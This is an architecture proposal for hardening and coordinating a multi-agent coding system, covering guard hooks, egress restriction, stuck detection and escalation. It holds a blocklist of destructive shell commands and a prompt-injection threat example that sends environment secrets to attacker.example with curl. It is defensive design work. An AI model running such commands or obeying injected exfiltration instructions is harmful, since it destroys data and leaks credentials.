Engineering Rig — Proposed Improvements (v2, Architect Revision)¶
This revision supersedes architecture-proposed.md (v1). It keeps v1's spirit — adopt what works, ignore what doesn't — but reaches different conclusions after a deeper read of the Conductor-E source, the Gastown architecture, and a wider audit of 14 multi-agent platforms documented in research-multi-agent-platforms.md.
The TL;DR: adopt 2 patterns from Gastown, reframe 2, drop 1, and add 6 things v1 missed entirely (4 from the wider research audit, 2 from a Conductor-E source-level read).
Why a v2¶
v1 enumerated five Gastown features and proposed adopting them as a bundle. Two problems with that framing:
1. Gastown's bundle hangs together because of one philosophy. Their core principle (called GUPP — "if there's work on your hook, you must run it") demands that agents push direct to main with no human gate. From that, they need:
- Prime, because every restart must reconstruct "what work am I on" from external state
- Hard guards with no override, because nobody is reviewing
- Identity attribution, because direct-to-main means commits must trace
- Escalation routing, because the only safety valve when stuck is paging up
Pull GUPP out and the bundle decouples. Our rig uses PR-based human-in-loop (Review-E gates, auto-merge fires only after approvals, Copilot reviews each commit). The pressure that justifies the full bundle isn't there.
2. The source tells a different story than the docs. A code-level audit of dashecorp/conductor-e revealed:
| Claim | Reality |
|---|---|
| 41 event types defined | 28 are actually defined in Events.cs. Docs are aspirational. |
GET /api/reviews/next is missing |
It exists in Program.cs:804–808 with optimistic claim semantics. README is stale. |
| Escalation is wired | Escalated event projects an issue to state="failed", but no Discord routing, no stale-detection cron, no auto re-escalation. The data model is half-built. |
| Assignment is smart | Pure priority + FIFO sort. No capacity check and no per-agent cursor — an agent can be assigned multiple issues if it doesn't behave; we can't reliably ask "what events has Dev-E acknowledged." |
3. The wider audit surfaced patterns that recur across independent codebases. When OpenHands, Goose, and Sweep all converge on cheap deterministic stuck-detection without anyone copying anyone, that's the strongest "build this" signal in the bunch. See research-multi-agent-platforms.md for the full convergence catalogue.
The Picks (in dependency order)¶
graph TB
subgraph "Phase 1 — Safety, Traceability, Hardening (small, parallel)"
p1[1. Dangerous-command guard]
p2[2. Agent identity in git]
p3[3. Default-deny egress NetworkPolicy]
p4[4. Git worktrees per agent task]
end
subgraph "Phase 2 — Reliability (small-medium, parallel after Phase 1)"
p5[5. Hook reliability spool]
p6[6. StuckGuard middleware]
p7[7. Human Prime SessionStart]
end
subgraph "Phase 3 — Smarter Coordination (medium)"
p8[8. Per-consumer cursor + agent subscription registry]
end
subgraph "Phase 4 — Loop Bounding & Escalation (medium)"
p9[9. Bounded-loop sentinel for Review/Dev ping-pong]
p10[10. Severity routing + StaleHeartbeatService]
end
p1 --> p5
p2 --> p5
p5 --> p6
p5 --> p8
p8 --> p9
p6 --> p10
p9 --> p10
Phases are dependency tiers, not weeks. Phase 1 is fully parallel. Phase 4 depends on reliable hooks (#5) and stuck detection (#6) so escalations are trustworthy.
1. Dangerous-command guard (adopt directly)¶
Problem¶
Agents can execute destructive shell commands. There is no guard. A confused or compromised session can git push --force, rm -rf /, drop tables, or run sudo apt remove.
Decision¶
Port Gastown's tap_guard_dangerous (internal/cmd/tap_guard_dangerous.go, ~50 lines) as a Bash equivalent. No override flag — Gastown intentionally has none. The right escape hatch is "the human runs the command outside the agent loop." This avoids the failure mode where an agent learns to bypass its own guard.
sequenceDiagram
participant CC as Claude Code
participant G as guard.sh
participant CE as Conductor-E
CC->>G: PreToolUse JSON on stdin
G->>G: Match command vs blocklist
alt safe
G-->>CC: exit 0
CC->>CC: Execute
else dangerous
G->>CE: POST /api/events GUARD_BLOCKED (best-effort)
G-->>CC: exit 2 + reason
CC->>CC: Refuses, asks human
end
Blocklist (mirrors Gastown's heuristics)¶
| Pattern | Notes |
|---|---|
sudo (any) |
Privilege escalation outside agent context |
rm -rf / or rm -rf /* |
Filesystem destruction. Local paths like rm -rf ./build/ allowed. |
git push --force |
Allow --force-with-lease and --force-if-includes |
git reset --hard, git clean -f |
Loses work |
drop table, drop database, truncate table |
Data loss |
kubectl delete namespace |
Cluster-scope destruction |
apt|apt-get|dnf|yum|pacman|brew install |
Should go through devcontainer image |
Drop from v1's plan¶
pr-workflow-guard (Gastown blocks gh pr create and git checkout -b because their agents push direct to main). We want PRs. Adopting this guard would break our model.
Touch¶
dashecorp/rig-tools (new hooks/dangerous-command-guard.sh + register in install.sh); dashecorp/rig-agent-runtime (add to base image hooks); HelmRelease values to wire into agent settings.
2. Agent identity in git (adopt directly, but trivially)¶
Problem¶
Commits from agents use generic author info. Cost dashboard already breaks down by agentId (per TokenUsageProjection), but git history doesn't.
Decision¶
Set GIT_AUTHOR_NAME and GIT_AUTHOR_EMAIL from the agent's agentId env var. For humans, the existing CONDUCTOR_AGENT_ID=human-$(whoami) already works — we just need to wire it through to git config in the devcontainer post-create.
This is a 5-line change. Do not call it a "system." It's an env var.
Touch¶
dashecorp/rig-gitops (HelmRelease values for dev-e and review-e); dashecorp/rig-agent-runtime (devcontainer post-create script).
3. Default-deny egress NetworkPolicy [research]¶
Problem¶
Today our agent pods have no egress restrictions. A prompt-injection vector that gets Dev-E to curl https://attacker.example/exfil -d "$(env)" would succeed. Cursor shipped default-deny egress for shell commands in their 2026 rewrite as the standard hardening for exactly this reason.
Decision¶
Add a per-agent K8s NetworkPolicy allowing egress only to:
- GitHub API + raw.githubusercontent.com (work source)
- api.anthropic.com (LLM)
- Conductor-E ClusterIP (event sink)
- Container registry (
europe-north1-docker.pkg.dev) - DNS (kube-system)
Block everything else by default. If an agent legitimately needs another endpoint, that's an explicit additive policy change reviewed in PR.
This is 30 lines of YAML per agent namespace. No code changes. Closes the prompt-injection-exfiltrates-secrets vector entirely.
Touch¶
dashecorp/rig-gitops (new apps/<agent>/network-policy.yaml per agent).
4. Git worktrees per agent task [research]¶
Problem¶
When KEDA scales Dev-E to >1 replica on the same repo (or even different issues in the same repo), each replica clones the full repo. That's slow on cold start, eats PVC space, and creates the failure mode where two replicas race on filesystem operations.
Cursor's Cloud Agents handles this with git worktrees: one bare clone per repo + N worktrees, one per active task. Atomic file ops, no race, fast cold start. They report 35% of their own merged PRs are now agent-authored — they've stress-tested this model.
Decision¶
In rig-agent-runtime startup:
# One bare clone per repo, cached
git clone --bare $REPO_URL /workspace/.bare/$REPO_NAME
# Per-task worktree, ephemeral
git -C /workspace/.bare/$REPO_NAME worktree add /workspace/work/$TASK_ID $BRANCH
Cleanup on pod termination removes the worktree but keeps the bare clone for the next replica.
Touch¶
dashecorp/rig-agent-runtime (startup script changes).
5. Hook reliability spool (gap v1 missed)¶
Problem¶
/tmp/dashecorp-rig-tools/hooks/conductor-e-hook.sh:63 fires events as curl ... & — fire-and-forget, no retry, no log. If Conductor-E is down (Flux reconciling, pod restarting, network blip), events vanish silently. Heartbeats vanish. Branch and PR creation events vanish. The cost dashboard goes blind. Stale-detection (Phase 4) becomes untrustworthy — an "absent heartbeat" might mean "agent is stuck" or "Conductor-E was down for 90 seconds."
Decision¶
Local spool with at-least-once delivery.
sequenceDiagram
participant H as hook.sh
participant SP as Spool dir
participant CE as Conductor-E
H->>SP: Append event JSON to spool file (ts + uuid)
H->>CE: POST /api/events (5s timeout)
alt ok
H->>SP: Delete spool entry
else fail or timeout
Note over H: Event stays in spool
end
Note over H,CE: --- next hook invocation ---
H->>SP: Drain (oldest first, max N per call)
SP->>CE: POST each
CE-->>H: 2xx to delete, otherwise keep
Detail¶
- Spool dir:
~/.cache/conductor-e-spool/(host) or/var/cache/conductor-e-spool/(in-pod) - Drain budget: max 20 events per hook invocation, max 1s wall time, oldest-first
- Idempotency: include
eventId(UUID) on every event so server-side dedup is possible (separate, optional) - Backoff: if Conductor-E returns 5xx three times in a row, skip drain for 30s (avoid hammering)
- Bound: cap spool at 1000 entries; drop oldest with a
WARNto stderr
Touch¶
dashecorp/rig-tools (modify hooks/conductor-e-hook.sh); dashecorp/rig-agent-runtime (mount spool dir in devcontainer).
6. StuckGuard middleware [research]¶
Problem¶
Agents can loop indefinitely. Today the only signal is: human notices, manually intervenes. The AgentStuck event type exists in Events.cs but nothing emits it autonomously.
The convergence signal¶
Three independent codebases — OpenHands StuckDetector, Goose RepetitionInspector, Sweep AI's visited_set + attempt counter — all converged on the same insight: don't ask the LLM whether it's stuck — count repeated tool calls and break above a threshold. None of them rely on the LLM noticing. This is the strongest "build this" signal in the wider research.
Decision¶
Implement a StuckGuard middleware in Dev-E (and Review-E) that runs in the agent loop, watching the last N tool calls. Detect 5 patterns from OpenHands' production-tested set:
| Pattern | Threshold | Meaning |
|---|---|---|
| Identical (tool, args) repeated | 4× | Agent is spinning on the same call |
| Same tool returning same error | 3× | Agent doesn't understand the failure |
| Multiple agent messages with no tool calls between them | 3× | Agent is monologuing |
| ABAB alternation (tool A → tool B → tool A → tool B) | 6 steps | Oscillating without progress |
| Context-window compaction marker repeated | 2× | Falling out of context |
On any pattern: emit AgentStuck { agentId, repo, issueNumber, pattern, recentCalls } to Conductor-E, then exit the agent loop. Phase 4's escalation router picks it up.
Why deterministic, not LLM-judged¶
LLM-judged stuck-detection has two failures: (1) it costs another model call per step, (2) the same agent that's stuck is the one being asked "are you stuck." Pattern-counting is cheap, deterministic, and works.
Touch¶
dashecorp/rig-agent-runtime (new src/middleware/stuck-guard.js); character.json toggles.
7. Human Prime (reframe of v1's "Session Recovery")¶
Why reframe¶
v1 framed this as "agents lose state on restart." They don't — Dev-E is a stateless K8s pod whose cron polls GET /api/assignments/next every 5 minutes. Conductor-E already remembers what each agent is on. Restart-resume for agents is essentially solved.
The real gap is for humans using Claude Code locally. When a human starts a new session, they have no equivalent of Gastown's prime. They have to remember what they were last working on.
Decision¶
Ship a SessionStart hook that does one HTTP call:
curl -s "$CONDUCTOR_URL/api/agents/$CONDUCTOR_AGENT_ID" \
| jq '{currentIssue, currentRepo, lastEvent}' \
| format-as-context
Plus a peek at the current git branch to derive the open PR (via gh pr view). Output as a brief context block at session start.
No tmux, no Beads, no roles, no markdown templates per role. That's all Gastown infrastructure justified by Gastown scale. We don't have it and don't need it.
Touch¶
dashecorp/rig-tools (new hooks/conductor-e-prime.sh, register SessionStart in install.sh).
8. Per-consumer cursor + agent subscription registry [research]¶
Why this replaces v1's "per-pod capacity events"¶
v1 proposed CapacityAvailable / CapacityFull events to make assignment capacity-aware. After reading LangGraph's versions_seen and MetaGPT's _watch + msg_buffer, the same problem has a cleaner shape: per-consumer cursor on the event log. Capacity is one of several things this enables, not its own primitive.
Problem¶
Today:
MartenEventStore.ClaimNextAssignmentAsync(lines 43–56) sorts by priority + last-updated. No capacity check.- Agents have no cursor — there's no way to ask "what events has Dev-E already consumed?"
- KEDA scales pods based on Valkey stream length, but Conductor-E has no notion of per-pod busy state.
- Two pods of the same agent class can both poll
assignments/nextand both get work.
All four are symptoms of the same missing abstraction.
Decision¶
Add an agent_cursors projection (Marten):
record AgentCursor(
string AgentId,
long LastEventOrdinal,
DateTimeOffset LastUpdated,
HashSet<string> SubscribedEventTypes,
int ConcurrentSlots, // typically 1
int InFlightAssignments // current count
);
Add an agent_subscriptions registry — a YAML file in rig-gitops that says, per agent class:
dev-e:
consumes: [IssueAssigned, ChangesRequested, ReviewLoopExceeded]
produces: [WorkStarted, BranchCreated, PrCreated, AgentStuck]
concurrent_slots: 1
review-e:
consumes: [PrCreated, ChangesPushed]
produces: [PrReviewApproved, ChangesRequested, ReviewLoopExceeded]
concurrent_slots: 2
Three benefits:
- Capacity-aware assignment.
ClaimNextAssignmentAsyncchecksConcurrentSlots - InFlightAssignments > 0before returning. - Topology validation at deploy time. A startup check that every
producestype has at least oneconsumesr catches dead-end events. (The AutoGen 0.4 pattern.) - Per-agent replay. "Show me everything Dev-E has acknowledged in the last hour" becomes a query against
LastEventOrdinal, not a log scrape.
Touch¶
dashecorp/conductor-e (new AgentCursorProjection, AgentSubscriptionRegistry, modify ClaimNextAssignmentAsync); dashecorp/rig-gitops (new apps/<agent>/subscription.yaml).
9. Bounded-loop sentinel for Review/Dev ping-pong [research]¶
Problem¶
ChatDev caps inner-phase chats at chat_turn_limit rounds. We don't. Review-E and Dev-E can theoretically ping-pong on a PR forever — Review requests changes, Dev pushes commits, Review requests more changes, repeat. There's no upper bound, no escalation.
Decision¶
Track the round-trip count per PR as a projection:
Increment on each (ChangesRequested → ChangesPushed) cycle. After 3 round-trips, emit ReviewLoopExceeded { repo, prNumber, count } and route to Phase 4's escalation as P1 severity.
Threshold is configurable per repo via subscription registry but defaults to 3.
Touch¶
dashecorp/conductor-e (new ReviewLoopStateProjection + new event type ReviewLoopExceeded).
10. Escalation completion: severity routing + stale-detection (extended)¶
What's already there¶
Escalatedevent type defined (Events.cs)Escalatedevent projects tostate="failed"(MartenProjections.cs:100–103)DiscordEventListenerexists as aBackgroundServiceand posts all issue events to per-issue threads
What's missing¶
- No severity dimension on
Escalated. It's a flag, not a level. - No routing logic — escalations land in the same per-issue thread as everything else, with no
@mention, no priority signal. - No stale-detection. The
AgentStuckevent type exists but nothing emits it autonomously (now solved by #6 StuckGuard for tool-loop stuck; this fills the heartbeat-stale case).
Decision¶
Add severity to escalation, add a StaleHeartbeatService background worker, route by severity. StuckGuard (#6) and ReviewLoopExceeded (#9) feed in alongside heartbeat-based detection.
graph TB
A[Agent or human hook] -->|Escalated severity:P1<br/>reason text| CE[Conductor-E]
SG[StuckGuard #6] -->|emits AgentStuck<br/>on tool-loop pattern| CE
SD[StaleHeartbeatService<br/>BackgroundService, 60s tick] -->|emits AgentStuck<br/>after 5min no heartbeat| CE
RL[ReviewLoopExceeded #9] --> CE
CE --> R{Router by severity}
R -->|P2| THR[Per-issue Discord thread]
R -->|P1| ADM[#admin channel]
R -->|P0| DM[Discord DM + @mention]
SU[Stale escalation projection<br/>30s tick] -->|unacked > 4h| BUMP[Bump severity P2 to P1, P1 to P0]
BUMP --> R
Why a projection-based escalator, not an LLM Mayor¶
Gastown uses an LLM "Deacon" agent to run gt escalate stale on a loop. We don't need an LLM for "if now - lastHeartbeat > 5min then emit AgentStuck." A C# BackgroundService is 30 lines. It also has the right reliability properties: it runs in-process with the event store, so it sees writes immediately and can't be racing a separate process.
Touch¶
dashecorp/conductor-e (Events.cs add severity to Escalated, add EscalationAcknowledged/EscalationClosed; new StaleHeartbeatService.cs; new EscalationRouter consumed by DiscordEventListener); dashecorp/rig-tools (conductor-e-hook ESCALATE --severity P1 "reason").
What v1 had that v2 drops¶
Centralized hooks merge framework¶
v1 proposed hooks-base.json + hooks-overrides/{role}.json + a merge script. Gastown has this because it serves 8 agent runtimes × 6 roles × N rigs and needs per-matcher composition rules.
We have ~3 agent classes and a handful of humans. The same outcome is achievable with HelmRelease values templating settings.json for agents (already partially done) and a single settings.json shipped by rig-tools/install.sh for humans. Two paths. No framework.
If we get to 8+ agent variants, revisit. Until then, this is premature abstraction.
pr-workflow-guard¶
Already covered above. Blocking gh pr create is opposite to our model.
Deferred (worth building, not in this milestone)¶
These came out of the wider research with real merit, but compete on attention with the picks above. Listed so they're not forgotten. Each is a follow-up proposal candidate, not a "next sprint" item.
| # | Pick | Source | Why deferred |
|---|---|---|---|
| D1 | PageRank-ranked repo map as RepoMapBuilt event |
Aider | Improves Dev-E cold-start grounding. ~3 days (tree-sitter + PageRank service). Defer until #8 cursor work is done — repo map should be cursor-driven. |
| D2 | Pre-assignment task refinement (clarifier) | Camel + GPT Pilot | Posts clarifying questions on ambiguous issues, labels needs-clarification. Saves Dev-E tokens. Adds an LLM call per intake (cost). Defer until we have data on intake fuzziness. |
| D3 | N parallel attempts + arbitration on KEDA scale-out | SWE-agent + Cognition | Today KEDA scales Dev-E to >1 only on stream length; multiple replicas on the same issue is rare. Build when that becomes common. |
| D4 | Formatter-reversion check | Sweep AI | Pre-commit hook that rejects Dev-E's edit if prettier/black reverses it. ~2 lines. Trivial — fold into devcontainer post-commit when convenient. |
| D5 | GitHub Spec Kit .specify/ layout for multi-PR work |
github/spec-kit | Markdown specs in repo, sub-issues from tasks/. Organizational change. Discuss separately before adopting. |
| D6 | Recipes as YAML config artifacts | Goose | Lift Dev-E / Review-E system-prompt patterns into versioned YAML. Worth it once we have 4+ recipes; today 2 prompts in HelmRelease values is fine. |
| D7 | ContextCompressed event for long-task resume |
Cognition | Lets a fresh Dev-E replica resume a long task. Build when we observe long-task context overruns in production. |
| D8 | QuestionAsked / QuestionAnswered paired events for sub-agent clarification |
CrewAI | Extends #8 (subscription registry). Build when there's a real use case for one agent asking another a clarifying question. |
What this does NOT change¶
- Conductor-E stays the central event store and assignment engine
- Marten + PostgreSQL stays — no Dolt/Beads
- GitHub Issues stays the source of truth — no
bd - FluxCD stays the GitOps layer
- KEDA scale-to-zero stays — improvement #8 makes it more accurate via cursor + capacity
- Discord stays the human-facing channel — improvement #10 routes within Discord, doesn't replace it
- AGENTS.md stays the cross-tool rules document
- Devcontainer + rig-agent-runtime image stays the unified environment
- MkDocs at rig-docs.pages.dev stays the published docs surface
These are layered improvements on top of an already-functioning rig. No rewrites.
Anthropic's overarching warning¶
The Anthropic Claude Agent SDK doc "Building Effective Agents" warns:
"Most multi-agent setups are slower and worse than a single agent with good tools — invest in agent-computer interface first."
Our 3-agent shape (Conductor-E, Dev-E, Review-E) has clean handoff boundaries and survives that warning. The trap to watch is growing the role count. When proposing a new agent, the bar is: "does this role have a clean event-shaped boundary with the existing agents?" If the answer requires shared intra-task context, build a tool instead. GPT Pilot's 6-role pipeline is now archived as unmaintained; it's evidence of where this fails.
Reading order for whoever picks this up¶
- architecture-current.md — what the rig looks like today
- architecture-proposed.md — v1, kept for history
- This document (v2) — the decided direction
- research-multi-agent-platforms.md — backing research with
[research]-tagged picks justified - documentation-standard.md — frontmatter, doc-check CI
- onboarding.md — devcontainer setup for humans
When this work is broken into issues, each section above ("Touch") names the repos involved.